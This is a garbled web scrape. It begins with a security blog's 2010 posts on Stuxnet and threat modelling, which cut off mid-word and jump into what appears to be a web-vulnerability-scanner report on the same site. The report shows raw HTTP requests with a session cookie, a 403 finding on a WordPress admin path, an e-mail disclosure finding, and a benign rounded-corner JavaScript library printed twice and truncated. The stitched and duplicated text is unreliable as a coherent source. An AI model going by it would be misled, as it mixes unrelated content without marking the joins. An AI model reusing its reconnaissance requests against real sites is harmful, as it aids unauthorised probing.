<div class="post-bodycopy clearfix"><p>Are we asking the right questions about the threats to control systems for 2011? A couple of things I’ve read today have me wondering about this.</p><p>First, I followed Bruce Schneier’s link to <a href="http://emergentchaos.com/archives/2010/12/the-tsas-approach-to-threat-modeling.html" mce_href="http://emergentchaos.com/archives/2010/12/the-tsas-approach-to-threat-modeling.html"--></p><p>Are we asking the right questions about the threats to control systems for 2011? A couple of things I’ve read today have me wondering about this.</p><p>First, I followed Bruce Schneier’s link to <a href="http://emergentchaos.com/archives/2010/12/the-tsas-approach-to-threat-modeling.html">this commentary</a> which talks about terror threat modeling from a software threat modeling point of view, specifically as it relates to some comments from President Obama regarding the TSA and a reference to the 2009 Christmas day bombing attempt. It’s somewhat tangental to control systems but the points are very applicable. Here’s one snippet:</p><blockquote><p>Half of getting the right answer is asking the right questions. If the question the President is hearing is “what can we do to protect against the threat that we saw in the Christmas day bombing (attempt)” then there are three possible interpretations. First is that the right question is being asked at a technical level, and the wrong question is being asked at the top. Second, the wrong questions are being asked up and down the line. Third is that the wrong question is being asked at the top, but it’s the right question for a TSA Administrator who wants to be able to testify before Congress that “everything possible was done.”</p></blockquote><p>The other thing I read this morning was Ralph Langner’s latest comment on <a href="http://www.digitalbond.com/index.php/2010/12/17/friday-news-and-notes-122/#comments">last week’s <a href=http://www.digitalbond.com/2010/12/22/will-stuxnet-become-our-christmas-day-bomber/> Read More </a></p></div>
<div class="post-footer">22 December 2010 | <a href="http://www.digitalbond.com/2010/12/22/will-stuxnet-become-our-christmas-day-bomber/#comments" class="comments-link" title="Comment on Will Stuxnet become our Christmas day bomber?">One comment</a></div>
<ul class="oio-banner-zone" id="oio-banner-2" style="width:610px; height:250px; margin:0 auto;"><li style="width:300px; height:250px; line-height:250px; margin:0 10px 0 0;"><a rel="nofollow" target="_blank" href="http://www.digitalbond.com/wp-content/plugins/oiopub-direct/modules/tracker/go.php?id=7" title="Critical Intelligence"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/oiopub-direct/uploads/ioEI4N_StayUptoDate2.jpg" alt="Critical Intelligence" style="width:300px; height:250px; border:0px;" /></a></li><li style="width:300px; height:250px; line-height:250px; margin:0 0 0 0;"><a rel="nofollow" target="_blank" href="http://www.digitalbond.com/wp-content/plugins/oiopub-direct/modules/tracker/go.php?id=9" title=""><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/oiopub-direct/uploads/tcsHnU_SEL_DigiBond_SecPosters_300x250.gif" alt="" style="width:300px; height:250px; border:0px;" /></a></li></ul>
</div><!-- / Post -->
<div class="post-8282 post type-post status-publish format-standard hentry category-1 odd" id="post-8282">
<div class="post-headline"> <h2> <a href="http://www.digitalbond.com/2010/12/17/friday-news-and-notes-122/" rel="bookmark" title="Permanent Link to Friday News and Notes">Friday News and Notes</a></h2>
</div>
<div class="post-byline">Dale Peterson</div>
<div class="post-bodycopy clearfix"><p>We can’t complain about too much Stuxnet after a one hour podcast with Ralph Langner, but there was a lot of news, analysis and speculation.<p>Gartner Group has a Lessons Learned From Stuxnet document available for purchase. Andrew Ginter read it and had <a href="http://controlsystemsecurity.blogspot.com/2010/12/gartner-security-lessons-learned-from.html">an interesting review</a>.</p><ul><li>The <a href="http://www.jpost.com/IranianThreat/News/Article.aspx?id=199475">Jerusalem Post quotes Ralph Langner</a> as saying Stuxnet set the Iranian nuclear weapons program back two years.</li></ul><ul><li><a href="http://blogs.forbes.com/firewall/2010/12/14/stuxnets-finnish-chinese-connection/">Jeffrey Carr thinks that China is the most likely culprit behind Stuxnet</a>. Hmmm, seems odd but who knows? They get blamed for everything cyber so let’..
Forbidden Resource
Forbidden Resource
1
TOTAL
INFORMATION
CONFIRMED
1
Access to this resource has been denied by the web server. This is generally not a security issue, and is reported here for information purposes.
Impact
There is no impact resulting from this issue.
|
- /wp-admin/css/
/wp-admin/css/ CONFIRMED |
Request
GET /wp-admin/css/ HTTP/1.1
Referer: https://www.digitalbond.com/wp-admin/css/login.css?ver=20110121
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.digitalbond.com
Cookie: PHPSESSID=5c8a40ddb91f1a2acfe18880a9fdfdca; wordpress_test_cookie=WP+Cookie+check
Accept-Encoding: gzip, deflate
Referer: https://www.digitalbond.com/wp-admin/css/login.css?ver=20110121
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.digitalbond.com
Cookie: PHPSESSID=5c8a40ddb91f1a2acfe18880a9fdfdca; wordpress_test_cookie=WP+Cookie+check
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 403 Forbidden
Server: nginx/0.7.65
Date: Tue, 19 Apr 2011 19:55:55 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Keep-Alive: timeout=10
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 184
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /wp-admin/css/on this server.</p></body></html>
Server: nginx/0.7.65
Date: Tue, 19 Apr 2011 19:55:55 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Keep-Alive: timeout=10
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 184
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /wp-admin/css/on this server.</p></body></html>
E-mail Address Disclosure
E-mail Address Disclosure
1
TOTAL
INFORMATION
Netsparker found e-mail addresses on the web site.
Impact
E-mail addresses discovered within the application can be used by both spam email engines and also brute force tools. Furthermore valid email addresses may lead to social engineering attacks .
Remedy
Use generic email addresses such as contact@ or info@ for general communications, remove user/people specific e-mail addresses from the web site, should this be required use submission forms for this purpose.
External References
|
- /wp-content/themes/atahualpa/js/DD_roundies.js
/wp-content/themes/atahualpa/js/DD_roundies.js |
Found E-mails
drew.diller@gmail.com
Request
GET /wp-content/themes/atahualpa/js/DD_roundies.js?ver=0.0.2a HTTP/1.1
Referer: https://www.digitalbond.com/wp-login.php?action=register
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.digitalbond.com
Cookie: PHPSESSID=5c8a40ddb91f1a2acfe18880a9fdfdca; wordpress_test_cookie=WP+Cookie+check
Accept-Encoding: gzip, deflate
Referer: https://www.digitalbond.com/wp-login.php?action=register
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.digitalbond.com
Cookie: PHPSESSID=5c8a40ddb91f1a2acfe18880a9fdfdca; wordpress_test_cookie=WP+Cookie+check
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Tue, 19 Apr 2011 19:55:55 GMT
Content-Type: application/x-javascript
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=10
Last-Modified: Fri, 14 Jan 2011 21:06:20 GMT
Expires: Wed, 20 Apr 2011 19:55:55 GMT
Cache-Control: max-age=86400
X-Type: static/local
Content-Encoding:
/**
* DD_roundies, this adds rounded-corner CSS in standard browsers and VML sublayers in IE that accomplish a similar appearance when comparing said browsers.
* Author: Drew Diller
* Email: drew.diller@gmail.com
* URL: http://www.dillerdesign.com/experiment/DD_roundies/
* Version: 0.0.2a
* Licensed under the MIT License: http://dillerdesign.com/experiment/DD_roundies/#license
*
* Usage:
* DD_roundies.addRule('#doc .container', '10px 5px'); // selector and multiple radii
* DD_roundies.addRule('.box', 5, true); // selector, radius, and optional addition of border-radius code for standard browsers.
*
* Just want the PNG fixing effect for IE6, and don't want to also use the DD_belatedPNG library? Don't give any additional arguments after the CSS selector.
* DD_roundies.addRule('.your .example img');
**/
var DD_roundies = {
ns: 'DD_roundies',
IE6: false,
IE7: false,
IE8: false,
IEversion: function() {
if (document.documentMode != 8 && document.namespaces && !document.namespaces[this.ns]) {
this.IE6 = true;
this.IE7 = true;
}
else if (document.documentMode == 8) {
this.IE8 = true;
}
},
querySelector: document.querySelectorAll,
selectorsToProcess: [],
imgSize: {},
createVmlNameSpace: function() { /* enable VML */
if (this.IE6 || this.IE7) {
document.namespaces.add(this.ns, 'urn:schemas-microsoft-com:vml');
}
if (this.IE8) {
document.writeln('<?import namespace="' + this.ns + '" implementation="#default#VML" ?>');
}
},
createVmlStyleSheet: function() { /* style VML, enable behaviors */
/*
Just in case lots of other developers have added
lots of other stylesheets using document.createStyleSheet
and hit the 31-limit mark, let's not use that method!
further reading: http://msdn.microsoft.com/en-us/library/ms531194(VS.85).aspx
*/
var style = document.createElement('style');
document.documentElement.firstChild.insertBefore(style, document.documentElement.firstChild.firstChild);
if (style.styleSheet) { /* IE */
try {
var styleSheet = style.styleSheet;
styleSheet.addRule(this.ns + '\\:*', '{behavior:url(#default#VML)}');
this.styleSheet = styleSheet;
} catch(err) {}
}
else {
this.styleSheet = style;
}
},
/**
* Method to use from afar - refer to it whenever.
* Example for IE only: DD_roundies.addRule('div.boxy_box', '10px 5px');
* Example for IE, Firefox, and WebKit: DD_roundies.addRule('div.boxy_box', '10px 5px', true);
* @param {String} selector - REQUIRED - a CSS selector, such as '#doc .container'
* @param {Integer} radius - REQUIRED - the desired radius for the box corners
* @param {Boolean} standards - OPTIONAL - true if you also wish to output -moz-border-radius/-webkit-border-radius/border-radius declarations
**/
addRule: function(selector, rad, standards) {
if (typeof rad == 'undefined' || rad === null) {
rad = 0;
}
if (rad.constructor.toString().search('Array') == -1) {
rad = rad.toString().replace(/[^0-9 ]/g, '').split(' ');
}
for (var i=0; i<4; i++) {
rad[i] = (!rad[i] && rad[i] !== 0) ? rad[Math.max((i-2), 0)] : rad[i];
}
if (this.styleSheet) {
if (this.styleSheet.addRule) { /* IE */
var selectors = selector.split(','); /* multiple selectors supported, no need for multiple calls to this anymore */
for (var i=0; i<selectors.length; i++) {
this.styleSheet.addRule(selectors[i], 'behavior:expression(DD_roundies.roundify.call(this, [' + rad.join(',') + ']))'); /* seems to execute the function without adding it to the stylesheet - interesting... */
}
}
else if (standards) {
var moz_implementation = rad.join('px ') + 'px';
this.styleSheet.appendChild(document.createTextNode(selector + ' {border-radius:' + moz_implementation + '; -moz-border-radius:' + moz_implementation + ';}'));
this.styleSheet.appendChild(document.createTextNode(selector + ' {-webkit-border-top-left-radius:' + rad[0] + 'px ' + rad[0] + 'px; -webkit-border-top-right-radius:' + rad[1] + 'px ' + rad[1] + 'px; -webkit-border-bottom-right-radius:' + rad[2] + 'px ' + rad[2] + 'px; -webkit-border-bottom-left-radius:' + rad[3] + 'px ' + rad[3] + 'px;}'));
}
}
else if (this.IE8) {
this.selectorsToProcess.push({'selector':selector, 'radii':rad});
}
},
readPropertyChanges: function(el) {
switch (event.propertyName) {
case 'style.border':
case 'style.borderWidth':
case 'style.padding':
this.applyVML(el);
break;
case 'style.borderColor':
this.vmlStrokeColor(el);
break;
case 'style.backgroundColor':
case 'style.backgroundPosition':
case 'style.backgroundRepeat':
this.applyVML(el);
break;
case 'style.display':
el.vmlBox.style.display = (el.style.display == 'none') ? 'none' : 'block';
break;
case 'style.filter':
this.vmlOpacity(el);
break;
case 'style.zIndex':
el.vmlBox.style.zIndex = el.style.zIndex;
break;
}
},
applyVML: function(el) {
el.runtimeStyle.cssText = '';
this.vmlFill(el);
this.vmlStrokeColor(el);
this.vmlStrokeWeight(el);
this.vmlOffsets(el);
this.vmlPath(el);
this.nixBorder(el);
this.vmlOpacity(el);
},
vmlOpacity: function(el) {
if (el.currentStyle.filter.search('lpha') != -1) {
var trans = el.currentStyle.filter;
trans = parseInt(trans.substring(trans.lastIndexOf('=')+1, trans.lastIndexOf(')')), 10)/100;
for (var v in el.vml) {
el.vml[v].filler.opacity = trans;
}
}
},
vmlFill: function(el) {
if (!el.currentStyle) {
return;
} else {
var elStyle = el.currentStyle;
}
el.runtimeStyle.backgroundColor = '';
el.runtimeStyle.backgroundImage = '';
var noColor = (elStyle.backgroundColor == 'transparent');
var noImg = true;
if (elStyle.backgroundImage != 'none' || el.isImg) {
if (!el.isImg) {
el.vmlBg = elStyle.backgroundImage;
el.vmlBg = el.vmlBg.substr(5, el.vmlBg.lastIndexOf('")')-5);
}
else {
el.vmlBg = el.src;
}
var lib = this;
if (!lib.imgSize[el.vmlBg]) { /* determine size of loaded image */
var img = document.createElement('img');
img.attachEvent('onload', function() {
this.width = this.offsetWidth; /* weird cache-busting requirement! */
this.height = this.offsetHeight;
lib.vmlOffsets(el);
});
img.className = lib.ns + '_sizeFinder';
img.runtimeStyle.cssText = 'behavior:none; position:absolute; top:-10000px; left:-10000px; border:none;'; /* make sure to set behavior to none to prevent accidental matching of the helper elements! */
img.src = el.vmlBg;
img.removeAttribute('width');
img.removeAttribute('height');
document.body.insertBefore(img, document.body.firstChild);
lib.imgSize[el.vmlBg] = img;
}
el.vml.image.filler.src = el.vmlBg;
noImg = false;
}
el.vml.image.filled = !noImg;
el.vml.image.fillcolor = 'none';
el.vml.color.filled = !noColor;
el.vml.color.fillcolor = elStyle.backgroundColor;
el.runtimeStyle.backgroundImage = 'none';
el.runtimeStyle.backgroundColor = 'transparent';
},
vmlStrokeColor: function(el) {
el.vml.stroke.fillcolor = el.currentStyle.borderColor;
},
vmlStrokeWeight: function(el) {
var borders = ['Top', 'Right', 'Bottom', 'Left'];
el.bW = {};
for (var b=0; b<4; b++) {
el.bW[borders[b]] = parseInt(el.currentStyle['border' + borders[b] + 'Width'], 10) || 0;
}
},
vmlOffsets: function(el) {
var dims = ['Left', 'Top', 'Width', 'Height'];
for (var d=0; d<4; d++) {
el.dim[dims[d]] = el['offset'+dims[d]];
}
var assign = function(obj, topLeft) {
obj.style.left = (topLeft ? 0 : el.dim.Left) + 'px';
obj.style.top = (topLeft ? 0 : el.dim.Top) + 'px';
obj.style.width = el.dim.Width + 'px';
obj.style.height = el.dim.Height + 'px';
};
for (var v in el.vml) {
var mult = (v == 'image') ? 1 : 2;
el.vml[v].coordsize = (el.dim.Width*mult) + ', ' + (el.dim.Height*mult);
assign(el.vml[v], true);
}
assign(el.vmlBox, false);
if (DD_roundies.IE8) {
el.vml.stroke.style.margin = '-1px';
if (typeof el.bW == 'undefined') {
this.vmlStrokeWeight(el);
}
el.vml.color.style.margin = (el.bW.Top-1) + 'px ' + (el.bW.Left-1) + 'px';
}
},
vmlPath: function(el) {
var coords = function(direction, w, h, r, aL, aT, mult) {
var cmd = direction ? ['m', 'qy', 'l', 'qx', 'l', 'qy', 'l', 'qx', 'l'] : ['qx', 'l', 'qy', 'l', 'qx', 'l', 'qy', 'l', 'm']; /* whoa */
aL *= mult;
aT *= mult;
w *= mult;
h *= mult;
var R = r.slice(); /* do not affect original array */
for (var i=0; i<4; i++) {
R[i] *= mult;
R[i] = Math.min(w/2, h/2, R[i]); /* make sure you do not get funky shapes - pick the smallest: half of the width, half of the height, or current value */
}
var coords = [
cmd[0] + Math.floor(0+aL) +','+ Math.floor(R[0]+aT),
cmd[1] + Math.floor(R[0]+aL) +','+ Math.floor(0+aT),
cmd[2] + Math.ceil(w-R[1]+aL) +','+ Math.floor(0+aT),
cmd[3] + Math.ceil(w+aL) +','+ Math.floor(R[1]+aT),
cmd[4] + Math.ceil(w+aL) +','+ Math.ceil(h-R[2]+aT),
cmd[5] + Math.ceil(w-R[2]+aL) +','+ Math.ceil(h+aT),
cmd[6] + Math.floor(R[3]+aL) +','+ Math.ceil(h+aT),
cmd[7] + Math.floor(0+aL) +','+ Math.ceil(h-R[3]+aT),
cmd[8] + Math.floor(0+aL) +','+ Math.floor(R[0]+aT)
];
if (!direction) {
coords.reverse();
}
var path = coords.join('');
return path;
};
if (typeof el.bW == 'undefined') {
this.vmlStrokeWeight(el);
}
var bW = el.bW;
var rad = el.DD_radii.slice();
/* determine outer curves */
var outer = coords(true, el.dim.Width, el.dim.Height, rad, 0, 0, 2);
/* determine inner curves */
rad[0] -= Math.max(bW.Left, bW.Top);
rad[1] -= Math.max(bW.Top, bW.Right);
rad[2] -= Math.max(bW.Right, bW.Bottom);
rad[3] -= Math.max(bW.Bottom, bW.Left);
for (var i=0; i<4; i++) {
rad[i] = Math.max(rad[i], 0);
}
var inner = coords(false, el.dim.Width-bW.Left-bW.Right, el.dim.Height-bW.Top-bW.Bottom, rad, bW.Left, bW.Top, 2);
var image = coords(true, el.dim.Width-bW.Left-bW.Right+1, el.dim.Height-bW.Top-bW.Bottom+1, rad, bW.Left, bW.Top, 1);
/* apply huge path string */
el.vml.color.path = inner;
el.vml.image.path = image;
el.vml.stroke.path = outer + inner;
this.clipImage(el);
},
nixBorder: function(el) {
var s = el.currentStyle;
var sides = ['Top', 'Left', 'Right', 'Bottom'];
for (var i=0; i<4; i++) {
el.runtimeStyle['padding' + sides[i]] = (parseInt(s['padding' + sides[i]], 10) || 0) + (parseInt(s['border' + sides[i] + 'Width'], 10) || 0) + 'px';
}
el.runtimeStyle.border = 'none';
},
clipImage: function(el) {
var lib = DD_roundies;
if (!el.vmlBg || !lib.imgSize[el.vmlBg]) {
return;
}
var thisStyle = el.currentStyle;
var bg = {'X':0, 'Y':0};
var figurePercentage = function(axis, position) {
var fraction = true;
switch(position) {
case 'left':
case 'top':
bg[axis] = 0;
break;
case 'center':
bg[axis] = 0.5;
break;
case 'right':
case 'bottom':
bg[axis] = 1;
break;
default:
if (position.search('%') != -1) {
bg[axis] = parseInt(position, 10) * 0.01;
}
else {
fraction = false;
}
}
var horz = (axis == 'X');
bg[axis] = Math.ceil(fraction ? (( el.dim[horz ? 'Width' : 'Height'] - (el.bW[horz ? 'Left' : 'Top'] + el.bW[horz ? 'Right' : 'Bottom']) ) * bg[axis]) - (lib.imgSize[el.vmlBg][horz ? 'width' : 'height'] * bg[axis]) : parseInt(position, 10));
bg[axis] += 1;
};
for (var b in bg) {
figurePercentage(b, thisStyle['backgroundPosition'+b]);
}
el.vml.image.filler.position = (bg.X/(el.dim.Width-el.bW.Left-el.bW.Right+1)) + ',' + (bg.Y/(el.dim.Height-el.bW.Top-el.bW.Bottom+1));
var bgR = thisStyle.backgroundRepeat;
var c = {'T':1, 'R':el.dim.Width+1, 'B':el.dim.Height+1, 'L':1}; /* these are defaults for repeat of any kind */
var altC = { 'X': {'b1': 'L', 'b2': 'R', 'd': 'Width'}, 'Y': {'b1': 'T', 'b2': 'B', 'd': 'Height'} };
if (bgR != 'repeat') {
c = {'T':(bg.Y), 'R':(bg.X+lib.imgSize[el.vmlBg].width), 'B':(bg.Y+lib.imgSize[el.vmlBg].height), 'L':(bg.X)}; /* these are defaults for no-repeat - clips down to the image location */
if (bgR.search('repeat-') != -1) { /* now let's revert to dC for repeat-x or repeat-y */
var v = bgR.split('repeat-')[1].toUpperCase();
c[altC[v].b1] = 1;
c[altC[v].b2] = el.dim[altC[v].d]+1;
}
if (c.B > el.dim.Height) {
c.B = el.dim.Height+1;
}
}
el.vml.image.style.clip = 'rect('+c.T+'px '+c.R+'px '+c.B+'px '+c.L+'px)';
},
pseudoClass: function(el) {
var self = this;
setTimeout(function() { /* would not work as intended without setTimeout */
self.applyVML(el);
}, 1);
},
reposition: function(el) {
this.vmlOffsets(el);
this.vmlPath(el);
},
roundify: function(rad) {
this.style.behavior = 'none';
if (!this.currentStyle) {
return;
}
else {
var thisStyle = this.currentStyle;
}
var allowed = {BODY: false, TABLE: false, TR: false, TD: false, SELECT: false, OPTION: false, TEXTAREA: false};
if (allowed[this.nodeName] === false) { /* elements not supported yet */
return;
}
var self = this; /* who knows when you might need a setTimeout */
var lib = DD_roundies;
this.DD_radii = rad;
this.dim = {};
/* attach handlers */
var handlers = {resize: 'reposition', move: 'reposition'};
if (this.nodeName == 'A') {
var moreForAs = {mouseleave: 'pseudoClass', mouseenter: 'pseudoClass', focus: 'pseudoClass', blur: 'pseudoClass'};
for (var a in moreForAs) {
handlers[a] = moreForAs[a];
}
}
for (var h in handlers) {
this.attachEvent('on' + h, function() {
lib[handlers[h]](self);
});
}
this.attachEvent('onpropertychange', function() {
lib.readPropertyChanges(self);
});
/* ensure that this elent and its parent is given hasLayout (needed for accurate positioning) */
var giveLayout = function(el) {
el.style.zoom = 1;
if (el.currentStyle.position == 'static') {
el.style.position = 'relative';
}
};
giveLayout(this.offsetParent);
giveLayout(this);
/* create vml elements */
this.vmlBox = document.createElement('ignore'); /* IE8 really wants to be encased in a wrapper element for the VML to work, and I don't want to disturb getElementsByTagName('div') - open to suggestion on how to do this differently */
this.vmlBox.runtimeStyle.cssText = 'behavior:none; position:absolute; margin:0; padding:0; border:0; background:none;'; /* super important - if something accidentally matches this (you yourseld did this once, Drew), you'll get infinitely-created elements and a frozen browser! */
this.vmlBox.style.zIndex = thisStyle.zIndex;
this.vml = {'color':true, 'image':true, 'stroke':true};
for (var v in this.vml) {
this.vml[v] = document.createElement(lib.ns + ':shape');
this.vml[v].filler = document.createElement(lib.ns + ':fill');
this.vml[v].appendChild(this.vml[v].filler);
this.vml[v].stroked = false;
this.vml[v].style.position = 'absolute';
this.vml[v].style.zIndex = thisStyle.zIndex;
this.vml[v].coordorigin = '1,1';
this.vmlBox.appendChild(this.vml[v]);
}
this.vml.image.fillcolor = 'none';
this.vml.image.filler.type = 'tile';
this.parentNode.insertBefore(this.vmlBox, this);
this.isImg = false;
if (this.nodeName == 'IMG') {
this.isImg = true;
this.style.visibility = 'hidden';
}
setTimeout(function() {
lib.applyVML(self);
}, 1);
}
};
try {
document.execCommand("BackgroundImageCache", false, true);
} catch(err) {}
DD_roundies.IEversion();
DD_roundies.createVmlNameSpace();
DD_roundies.createVmlStyleSheet();
if (DD_roundies.IE8 && document.attachEvent && DD_roundies.querySelector) {
document.attachEvent('onreadystatechange', function() {
if (document.readyState == 'complete') {
var selectors = DD_roundies.selectorsToProcess;
var length = selectors.length;
var delayedCall = function(node, radii, index) {
setTimeout(function() {
DD_roundies.roundify.call(node, radii);
}, index*100);
};
for (var i=0; i<length; i++) {
var results = document.querySelectorAll(selectors[i].selector);
var rLength = results.length;
for (var r=0; r<rLength; r++) {
if (results[r].nodeName != 'INPUT') { /* IE8 doesn't like to do this to inputs yet */
delayedCall(results[r], selectors[i].radii, r);
}
}
}
}
});
}
Server: nginx/0.7.65
Date: Tue, 19 Apr 2011 19:55:55 GMT
Content-Type: application/x-javascript
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=10
Last-Modified: Fri, 14 Jan 2011 21:06:20 GMT
Expires: Wed, 20 Apr 2011 19:55:55 GMT
Cache-Control: max-age=86400
X-Type: static/local
Content-Encoding:
/**
* DD_roundies, this adds rounded-corner CSS in standard browsers and VML sublayers in IE that accomplish a similar appearance when comparing said browsers.
* Author: Drew Diller
* Email: drew.diller@gmail.com
* URL: http://www.dillerdesign.com/experiment/DD_roundies/
* Version: 0.0.2a
* Licensed under the MIT License: http://dillerdesign.com/experiment/DD_roundies/#license
*
* Usage:
* DD_roundies.addRule('#doc .container', '10px 5px'); // selector and multiple radii
* DD_roundies.addRule('.box', 5, true); // selector, radius, and optional addition of border-radius code for standard browsers.
*
* Just want the PNG fixing effect for IE6, and don't want to also use the DD_belatedPNG library? Don't give any additional arguments after the CSS selector.
* DD_roundies.addRule('.your .example img');
**/
var DD_roundies = {
ns: 'DD_roundies',
IE6: false,
IE7: false,
IE8: false,
IEversion: function() {
if (document.documentMode != 8 && document.namespaces && !document.namespaces[this.ns]) {
this.IE6 = true;
this.IE7 = true;
}
else if (document.documentMode == 8) {
this.IE8 = true;
}
},
querySelector: document.querySelectorAll,
selectorsToProcess: [],
imgSize: {},
createVmlNameSpace: function() { /* enable VML */
if (this.IE6 || this.IE7) {
document.namespaces.add(this.ns, 'urn:schemas-microsoft-com:vml');
}
if (this.IE8) {
document.writeln('<?import namespace="' + this.ns + '" implementation="#default#VML" ?>');
}
},
createVmlStyleSheet: function() { /* style VML, enable behaviors */
/*
Just in case lots of other developers have added
lots of other stylesheets using document.createStyleSheet
and hit the 31-limit mark, let's not use that method!
further reading: http://msdn.microsoft.com/en-us/library/ms531194(VS.85).aspx
*/
var style = document.createElement('style');
document.documentElement.firstChild.insertBefore(style, document.documentElement.firstChild.firstChild);
if (style.styleSheet) { /* IE */
try {
var styleSheet = style.styleSheet;
styleSheet.addRule(this.ns + '\\:*', '{behavior:url(#default#VML)}');
this.styleSheet = styleSheet;
} catch(err) {}
}
else {
this.styleSheet = style;
}
},
/**
* Method to use from afar - refer to it whenever.
* Example for IE only: DD_roundies.addRule('div.boxy_box', '10px 5px');
* Example for IE, Firefox, and WebKit: DD_roundies.addRule('div.boxy_box', '10px 5px', true);
* @param {String} selector - REQUIRED - a CSS selector, such as '#doc .container'
* @param {Integer} radius - REQUIRED - the desired radius for the box corners
* @param {Boolean} standards - OPTIONAL - true if you also wish to output -moz-border-radius/-webkit-border-radius/border-radius declarations
**/
addRule: function(selector, rad, standards) {
if (typeof rad == 'undefined' || rad === null) {
rad = 0;
}
if (rad.constructor.toString().search('Array') == -1) {
rad = rad.toString().replace(/[^0-9 ]/g, '').split(' ');
}
for (var i=0; i<4; i++) {
rad[i] = (!rad[i] && rad[i] !== 0) ? rad[Math.max((i-2), 0)] : rad[i];
}
if (this.styleSheet) {
if (this.styleSheet.addRule) { /* IE */
var selectors = selector.split(','); /* multiple selectors supported, no need for multiple calls to this anymore */
for (var i=0; i<selectors.length; i++) {
this.styleSheet.addRule(selectors[i], 'behavior:expression(DD_roundies.roundify.call(this, [' + rad.join(',') + ']))'); /* seems to execute the function without adding it to the stylesheet - interesting... */
}
}
else if (standards) {
var moz_implementation = rad.join('px ') + 'px';
this.styleSheet.appendChild(document.createTextNode(selector + ' {border-radius:' + moz_implementation + '; -moz-border-radius:' + moz_implementation + ';}'));
this.styleSheet.appendChild(document.createTextNode(selector + ' {-webkit-border-top-left-radius:' + rad[0] + 'px ' + rad[0] + 'px; -webkit-border-top-right-radius:' + rad[1] + 'px ' + rad[1] + 'px; -webkit-border-bottom-right-radius:' + rad[2] + 'px ' + rad[2] + 'px; -webkit-border-bottom-left-radius:' + rad[3] + 'px ' + rad[3] + 'px;}'));
}
}
else if (this.IE8) {
this.selectorsToProcess.push({'selector':selector, 'radii':rad});
}
},
readPropertyChanges: function(el) {
switch (event.propertyName) {
case 'style.border':
case 'style.borderWidth':
case 'style.padding':
this.applyVML(el);
break;
case 'style.borderColor':
this.vmlStrokeColor(el);
break;
case 'style.backgroundColor':
case 'style.backgroundPosition':
case 'style.backgroundRepeat':
this.applyVML(el);
break;
case 'style.display':
el.vmlBox.style.display = (el.style.display == 'none') ? 'none' : 'block';
break;
case 'style.filter':
this.vmlOpacity(el);
break;
case 'style.zIndex':
el.vmlBox.style.zIndex = el.style.zIndex;
break;
}
},
applyVML: function(el) {
el.runtimeStyle.cssText = '';
this.vmlFill(el);
this.vmlStrokeColor(el);
this.vmlStrokeWeight(el);
this.vmlOffsets(el);
this.vmlPath(el);
this.nixBorder(el);
this.vmlOpacity(el);
},
vmlOpacity: function(el) {
if (el.currentStyle.filter.search('lpha') != -1) {
var trans = el.currentStyle.filter;
trans = parseInt(trans.substring(trans.lastIndexOf('=')+1, trans.lastIndexOf(')')), 10)/100;
for (var v in el.vml) {
el.vml[v].filler.opacity = trans;
}
}
},
vmlFill: function(el) {
if (!el.currentStyle) {
return;
} else {
var elStyle = el.currentStyle;
}
el.runtimeStyle.backgroundColor = '';
el.runtimeStyle.backgroundImage = '';
var noColor = (elStyle.backgroundColor == 'transparent');
var noImg = true;
if (elStyle.backgroundImage != 'none' || el.isImg) {
if (!el.isImg) {
el.vmlBg = elStyle.backgroundImage;
el.vmlBg = el.vmlBg.substr(5, el.vmlBg.lastIndexOf('")')-5);
}
else {
el.vmlBg = el.src;
}
var lib = this;
if (!lib.imgSize[el.vmlBg]) { /* determine size of loaded image */
var img = document.createElement('img');
img.attachEvent('onload', function() {
this.width = this.offsetWidth; /* weird cache-busting requirement! */
this.height = this.offsetHeight;
lib.vmlOffsets(el);
});
img.className = lib.ns + '_sizeFinder';
img.runtimeStyle.cssText = 'behavior:none; position:absolute; top:-10000px; left:-10000px; border:none;'; /* make sure to set behavior to none to prevent accidental matching of the helper elements! */
img.src = el.vmlBg;
img.removeAttribute('width');
img.removeAttribute('height');
document.body.insertBefore(img, document.body.firstChild);
lib.imgSize[el.vmlBg] = img;
}
el.vml.image.filler.src = el.vmlBg;
noImg = false;
}
el.vml.image.filled = !noImg;
el.vml.image.fillcolor = 'none';
el.vml.color.filled = !noColor;
el.vml.color.fillcolor = elStyle.backgroundColor;
el.runtimeStyle.backgroundImage = 'none';
el.runtimeStyle.backgroundColor = 'transparent';
},
vmlStrokeColor: function(el) {
el.vml.stroke.fillcolor = el.currentStyle.borderColor;
},
vmlStrokeWeight: function(el) {
var borders = ['Top', 'Right', 'Bottom', 'Left'];
el.bW = {};
for (var b=0; b<4; b++) {
el.bW[borders[b]] = parseInt(el.currentStyle['border' + borders[b] + 'Width'], 10) || 0;
}
},
vmlOffsets: function(el) {
var dims = ['Left', 'Top', 'Width', 'Height'];
for (var d=0; d<4; d++) {
el.dim[dims[d]] = el['offset'+dims[d]];
}
var assign = function(obj, topLeft) {
obj.style.left = (topLeft ? 0 : el.dim.Left) + 'px';
obj.style.top = (topLeft ? 0 : el.dim.Top) + 'px';
obj.style.width = el.dim.Width + 'px';
obj.style.height = el.dim.Height + 'px';
};
for (var v in el.vml) {
var mult = (v == 'image') ? 1 : 2;
